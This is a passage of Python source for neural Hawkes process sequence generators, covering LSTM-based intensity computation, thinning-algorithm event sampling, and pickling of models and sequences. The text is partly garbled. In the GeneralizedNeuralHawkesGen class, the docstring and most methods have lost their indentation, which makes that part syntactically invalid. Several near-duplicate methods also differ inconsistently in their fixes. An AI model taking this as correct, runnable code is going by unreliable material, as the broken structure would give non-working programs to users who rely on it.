            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
        #
        return time_current
    #
    def gen_one_seq(self, max_len):
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        #
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # refresh the LSTM state for the most recent event
            self.compute_hidden_states()
            #
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            # keep the earliest candidate, discard the others
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        # Generate settings['num_seqs'] sequences; each length is drawn
        # uniformly from [settings['min_len'], settings['max_len']].
        num_seqs = settings['num_seqs']
        #
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            #
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            #
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        # Pretty-print up to the first 10 generated sequences.
        # Fixed: clamp to len(self.list_seqs) so fewer than 10
        # sequences no longer raises IndexError.
        print("printing some seqs ... ")
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events, list_time = [], []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
            print(list_events)
            print(list_time)
    #
    def save_seqs(self, file_save):
        # Persist generated sequences with pickle.
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class GeneralizedNeuralHawkesGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
    def __init__(self, settings):
        # Generator for the "generalized" neural Hawkes process: like
        # NeuralHawkesGen, but the decay rates are produced from the
        # hidden state through the 3-d tensor W_delta instead of being
        # fixed parameters.
        #
        # settings keys read here: 'dim_process', 'dim_LSTM', 'args',
        # 'seed_random'.
        #
        # NOTE: the parameter draws below consume the seeded RNG in a
        # fixed order; reordering them would change the generated model.
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        #
        # elapsed times are fed to the LSTM as 32-bit float encodings
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        #
        self.args = settings['args']
        numpy.random.seed(
            settings['seed_random']
        )
        # base (exogenous) intensity per event type
        self.mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_process,)
            )
        )
        #
        # maps the hidden state to per-(hidden, type) decay rates
        self.W_delta = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high= 1.0,
                size=(
                    self.dim_model, self.dim_model,
                    self.dim_process
                )
            )
        )
        #
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # one extra embedding row for the BOS marker (type dim_process)
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        #
        self.name = 'GeneralizedNeuralHawkesGen'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS marker: a pseudo event of type dim_process at time 0,
        # used to initialize the LSTM state
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + self.mu
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(self.mu)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
    def sample_time_given_type(self, type_event):
        # type_event is the type of event for which we want to sample the time
        # it is the little k in our model formulation in paper
        #
        # Thinning (rejection) sampler: propose exponential jumps under
        # the constant hazard intensity_ub[k] and accept with probability
        # intensity[k] / hazard. The RNG draw order (E then U on each
        # iteration) is part of the reproducible behavior under a seed.
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        #
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        # u >= 1.0 means "rejected": advance time and try again
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
        #
        return time_current
#
#
#
    def gen_one_seq(self, max_len):
        # Generate one sequence of max_len events: at each step, draw a
        # candidate time for every event type via thinning and keep the
        # earliest candidate as the next event.
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        #
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        # timestamp of the most recent occurrence of each type, used for
        # the time_since_last_same_event bookkeeping
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            # candidate occurrence time for every event type
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            #
            # compute the hidden states
            # of the most recent event in sequence
            self.compute_hidden_states()
            #
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            #
            # the earliest candidate wins; its type becomes the new event
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item
        # at the head of the sequence
        self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen(object):
    '''
    Sequence generator for a neural Hawkes process with an adaptive base
    rate: the background intensity is computed from the LSTM hidden state
    via W_mu instead of being a free mu vector. Inter-event times are fed
    to the LSTM through the 32 bits of their float32 representation.
    '''
    def __init__(self, settings):
        """Initialize dimensions and randomly drawn parameters.

        settings must provide: 'dim_process', 'dim_LSTM', 'args',
        'seed_random'.
        """
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        #
        # a time value is embedded through the 32 bits of its float32
        # representation
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        #
        self.args = settings['args']
        numpy.random.seed(
            settings['seed_random']
        )
        # hidden-state -> base-rate projection
        self.W_mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high = 1.0,
                size = (
                    self.dim_model, self.dim_process
                )
            )
        )
        # hidden-state -> decay-rate projection
        self.W_delta = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high = 1.0,
                size=(
                    self.dim_model, self.dim_model,
                    self.dim_process
                )
            )
        )
        # excitation weights
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # event-type embeddings; one extra row for the BOS marker
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        # embedding of the 32-bit time representation
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        # LSTM recurrence over [event emb; time emb; hidden]
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        #
        self.name = 'AdaptiveNeuralHawkesGen'
        #
        # caches filled by the compute_intensity_* methods
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        # the sequence starts with a BOS item of type dim_process
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def soft_relu(self, x):
        # softplus: log(1 + exp(x)), smooth and always positive
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def hard_relu(self, x):
        # ReLU via max(x, 0) == (x + |x|) / 2
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        """Pickle all parameters and meta information to file_save."""
        print("saving model of generator ... ")
        model_dict = {
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        """Reset per-sequence state: intensity caches, the event list
        (re-seeded with a BOS item), and the LSTM hidden/cell vectors."""
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Convert a number to float32 and return its 32 IEEE-754 bits as a
        vector of 0.0/1.0 values, most significant bit first.
        '''
        float32_input = numpy.float32(float_input)
        # BUGFIX: the previous version did ord(c) over struct.pack(...),
        # which raises TypeError on Python 3 where iterating bytes yields
        # ints; bytearray yields ints on both Python 2 and Python 3.
        str_input = ''.join(
            format(byte, '08b')
            for byte in bytearray(struct.pack('!f', float32_input))
        )
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        # logistic function 1 / (1 + exp(-x))
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        """Advance the LSTM one step, consuming the type and inter-event
        time of the last event in self.one_seq; updates self.hidden_t and
        self.cell_t in place."""
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        emb_time_t = numpy.dot(
            self.float32_to_bit(
                self.one_seq[-1]['time_since_last_event']
            ),
            self.Emb_time
        )
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        # the 4*dim_model pre-activations are split into the LSTM gates
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        """Compute self.intensity at time_current given the history."""
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        # hidden state decayed since the last event,
        # shape (dim_model, dim_process)
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # excitation plus the adaptive base rate dot(hidden_t, W_mu)
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time,
            axis = 0
        ) + numpy.dot(
            self.hidden_t, self.W_mu
        )
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        """Compute self.intensity_ub, an upper bound of the intensity for
        t >= time_current (only non-negative excitation terms kept)."""
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time
            ),
            axis = 0
        ) + self.hard_relu(
            numpy.dot(
                self.hidden_t, self.W_mu
            )
        )
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of type_event via thinning:
        propose Exp(bound) waiting times and accept with probability
        intensity / bound."""
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        u = 1.5  # > 1.0 so the loop body runs at least once
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
        return time_current
    #
    def gen_one_seq(self, max_len):
        """Generate one sequence of max_len events by thinning: sample a
        candidate time per event type and keep the earliest."""
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        #
        max_len is a pre-sampled value to set the length of seq
        '''
        time_since_start = numpy.float32(0.0)
        # timestamp of the last occurrence of each type
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # compute the hidden states of the most recent event
            self.compute_hidden_states()
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            # the earliest candidate becomes the next event
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        """Generate settings['num_seqs'] sequences with lengths drawn
        uniformly from [min_len, max_len]; stored in self.list_seqs."""
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # progress report every 10 sequences
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        """Print event types and rounded timestamps of the first 10
        generated sequences."""
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events, list_time = [], []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
            print(list_events)
            print(list_time)
    #
    def save_seqs(self, file_save):
        """Pickle the generated sequences to file_save."""
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time(object):
    '''
    Sequence generator for a neural Hawkes process with an adaptive base
    rate and a threshold-based representation of inter-event times:
    time is encoded as hard_relu(dt - Threshold_time) concatenated with
    the raw dt, instead of the 32-bit encoding of the parent variant.
    '''
    def __init__(self, settings):
        """Initialize the generator.

        If settings['path_pre_train'] is None, parameters are drawn
        uniformly at random (seeded by settings['seed_random']);
        otherwise they are loaded from the pickled model at that path.
        """
        print("initializing generator ... ")
        self.args = settings['args']
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] is None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            #
            self.dim_time = self.dim_float
            numpy.random.seed(
                settings['seed_random']
            )
            # hidden-state -> base-rate projection
            self.W_mu = numpy.float32(
                numpy.random.uniform(
                    low = -1.0, high = 1.0,
                    size = (
                        self.dim_model, self.dim_process
                    )
                )
            )
            # hidden-state -> decay-rate projection
            self.W_delta = numpy.float32(
                numpy.random.uniform(
                    low = -1.0, high = 1.0,
                    size=(
                        self.dim_model, self.dim_model,
                        self.dim_process
                    )
                )
            )
            # excitation weights
            self.W_alpha = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_model, self.dim_process)
                )
            )
            # event-type embeddings; one extra row for the BOS marker
            self.Emb_event = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_process + numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            # time embedding: dim_time thresholded features + raw dt
            self.Emb_time = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_time+numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            self.Threshold_time = numpy.float32(
                numpy.random.uniform(
                    low = 0.0, high = 1.0,
                    size = (self.dim_time, )
                )
            )
            # LSTM recurrence over [event emb; time emb; hidden]
            self.W_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        3 * self.dim_model,
                        4 * self.dim_model
                    )
                )
            )
            self.b_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (4*self.dim_model, )
                )
            )
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            #
            self.W_mu = model_pre_train['W_mu']
            self.W_delta = model_pre_train['W_delta']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.Emb_time = model_pre_train['Emb_time']
            self.Threshold_time = model_pre_train['Threshold_time']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        self.name = 'AdaptiveNeuralHawkesGen_time'
        #
        # caches filled by the compute_intensity_* methods
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        # the sequence starts with a BOS item of type dim_process
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("initialization done ")
    #
    def soft_relu(self, x):
        # softplus: log(1 + exp(x)), smooth and always positive
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def hard_relu(self, x):
        # ReLU via max(x, 0) == (x + |x|) / 2
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        """Pickle all parameters and meta information to file_save.

        Saves every key the pretrained-load branch of __init__ expects,
        so save/load round trips are lossless.
        """
        print("saving model of generator ... ")
        model_dict = {
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            # BUGFIX: Threshold_time was missing, so reloading a saved
            # model via path_pre_train raised KeyError
            'Threshold_time': numpy.copy(self.Threshold_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        """Reset per-sequence state: intensity caches, the event list
        (re-seeded with a BOS item), and the LSTM hidden/cell vectors."""
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Convert a number to float32 and return its 32 IEEE-754 bits as a
        vector of 0.0/1.0 values, most significant bit first.
        '''
        float32_input = numpy.float32(float_input)
        # BUGFIX: the previous version did ord(c) over struct.pack(...),
        # which raises TypeError on Python 3 where iterating bytes yields
